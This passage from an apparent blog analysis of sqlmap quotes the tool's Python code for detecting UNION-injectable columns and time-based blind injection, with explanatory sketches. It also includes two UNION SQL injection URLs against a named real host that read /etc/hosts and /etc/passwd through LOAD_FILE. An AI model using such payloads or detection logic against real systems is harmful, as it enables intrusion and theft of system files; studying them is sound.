        if item[1] == min_:
            minItem = item
        elif item[1] == max_:
            maxItem = item

    if min_ < lower:
        retVal = minItem[0]

    if max_ > upper:
        if retVal is None or abs(max_ - upper) > abs(min_ - lower):
            retVal = maxItem[0]

    kb.errorIsNone = popValue()

    if retVal:
        infoMsg = "target url appears to be UNION injectable with %d columns" % retVal
        logger.info(infoMsg)

    return retVal
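The column-count decision is an outlier test: the one column count that makes the UNION valid should give a similarity ratio far away from all the others. The sketch below restates that test in Python 3 under some assumptions: pick_column_count is a hypothetical helper, the ratios are invented, and statistics.stdev (sample standard deviation) stands in for sqlmap's own stdev helper, whose exact definition is not shown here.

```python
from statistics import mean, stdev

UNION_STDEV_COEFF = 7          # value quoted in the code comments above
MIN_STATISTICAL_RANGE = 0.01   # value quoted in the code comments above


def pick_column_count(items):
    """items: list of (column_count, similarity_ratio) pairs."""
    ratios = [ratio for _, ratio in items]
    lo, hi = min(ratios), max(ratios)
    if abs(hi - lo) < MIN_STATISTICAL_RANGE:
        return None  # all pages look alike, nothing stands out

    rest = list(ratios)
    rest.remove(lo)  # drop one minimum and one maximum before averaging
    rest.remove(hi)
    avg, dev = mean(rest), stdev(rest)
    lower = avg - UNION_STDEV_COEFF * dev
    upper = avg + UNION_STDEV_COEFF * dev

    result = None
    if lo < lower:
        result = next(c for c, r in items if r == lo)
    if hi > upper and (result is None or abs(hi - upper) > abs(lo - lower)):
        result = next(c for c, r in items if r == hi)
    return result


# Invented ratios: only the 4-column request returns a page like the original.
samples = [(1, 0.50), (2, 0.51), (3, 0.50), (4, 0.95), (5, 0.51), (6, 0.50), (7, 0.51)]
columns = pick_column_count(samples)
flat = pick_column_count([(n, 0.5) for n in range(1, 6)])
print(columns, flat)
```

Removing the extremes before computing the mean and deviation keeps the candidate outlier from inflating the very band it is tested against.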

(3) Add the FROM table name that the specific database requires
(4) Verify again

def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
    validPayload = None
    vector = None

    positions = range(0, count)

    # Unbiased approach for searching appropriate usable column
    # (shuffle the elements of the list)
    random.shuffle(positions)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    # Look for a column whose value is displayed
    for position in positions:
        # Prepare expression with delimiters
        randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)  # UNION_MIN_RESPONSE_CHARS = 10
        # Build a random string to use as a marker
        phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        import logging
        logging.debug('randQueryProcessed: %s' % randQueryProcessed)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        # (build the UNION ALL SELECT query)
        query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

        # Perform the request
        page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
        # Remove reflected values
        content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
            removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
            payload, True) or "")

        if content and phrase in content:
            validPayload = payload
            vector = (position, count, comment, prefix, suffix, conf.uChar, where)

            if where == PAYLOAD.WHERE.ORIGINAL:
                # Prepare expression with delimiters
                randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)  # UNION_MIN_RESPONSE_CHARS = 10
                phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)

                # Confirm that it is a full inband SQL injection
                query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
                payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)

                # Perform the request
                page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
                content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")

                if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):
                    vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)

            break

    return validPayload, vector

http://ipv6.tsinghua.edu.cn/end.php?ID=-3255%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,107,113,117,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,104,111,115,116,115%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,101,114,112,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#
http://ipv6.tsinghua.edu.cn/end.php?ID=-8675%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,108,100,107,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,112,97,115,115,119,100%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,111,121,105,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#

Response time: time-based blind and stacked queries SQL injection

Whether a response was delayed is decided statistically by wasLastRequestDelayed in lib/core/common.py; the reasoning is given in sqlmap's own comments:

def wasLastRequestDelayed():
    """
    Returns True if the last web request resulted in a time-delay
    """

    # 99.9999999997440% of all non time-based sql injection affected
    # response times should be inside +-7*stdev([normal response times])
    # Math reference: http://www.answers.com/topic/standard-deviation
    deviation = stdev(kb.responseTimes)  # standard deviation of all response times
    threadData = getCurrentThreadData()

    if deviation:
        # The statistics are only meaningful with enough samples
        # MIN_TIME_RESPONSES = 10
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            warnMsg = "time-based standard deviation method used on a model "
            warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
            logger.warn(warnMsg)

        # TIME_STDEV_COEFF = 10, must be greater than or equal to 7
        lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation
        retVal = (threadData.lastQueryDuration >= lowerStdLimit)

        # If retVal is True a delay occurred and the delay time may be adjusted
        # TIME_DEFAULT_DELAY = 5; kb.testMode is the SQL injection test mode;
        # conf.timeSec == TIME_DEFAULT_DELAY means the user has not changed the delay manually
        if not kb.testMode and retVal and conf.timeSec == TIME_DEFAULT_DELAY:
            adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)

        return retVal
    else:
        return (threadData.lastQueryDuration - conf.timeSec) >= 0


# length of queue for candidates for time delay adjustment
TIME_DELAY_CANDIDATES = 3
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]  # i.e. [0, 0, 0]


def adjustTimeDelay(lastQueryDuration, lowerStdLimit):
    """
    Adjusts time delay in time-based data retrieval
    """

    candidate = 1 + int(round((1 - (lastQueryDuration - lowerStdLimit) / lastQueryDuration) * conf.timeSec))

    if candidate:
        kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]

        if all([x == candidate for x in kb.delayCandidates]) and candidate < conf.timeSec:
            print

            warnMsg = "adjusting time delay to %d second%s " % (candidate, 's' if candidate > 1 else '')
            warnMsg += "(due to good response times)"
            logger.warn(warnMsg)

            conf.timeSec = candidate
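The statistical threshold can be reproduced with the standard library. This is a sketch in Python 3 rather than the function above: was_delayed is a hypothetical helper, the response times are invented, and statistics.stdev is assumed to be close enough to sqlmap's own stdev helper for illustration.

```python
from statistics import mean, stdev

TIME_STDEV_COEFF = 10  # value quoted in the code comments above


def was_delayed(normal_times, last_duration, coeff=TIME_STDEV_COEFF):
    """Flag a response as delayed if it exceeds mean + coeff * stdev."""
    threshold = mean(normal_times) + coeff * stdev(normal_times)
    return last_duration >= threshold, threshold


# Invented baseline of ordinary response times, in seconds.
baseline = [0.21, 0.19, 0.20, 0.22, 0.18, 0.20, 0.21, 0.19, 0.20, 0.20]
delayed, limit = was_delayed(baseline, 5.3)   # response after an injected sleep
normal, _ = was_delayed(baseline, 0.25)       # slightly slow, but ordinary
print(delayed, normal, round(limit, 3))
```

Tying the threshold to the observed spread means a jittery connection raises the bar automatically, instead of relying on a fixed number of seconds.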


Source: https://usmacd.com/cn/sqlmap_sql_injection/
Author: henices
Published: July 7, 2017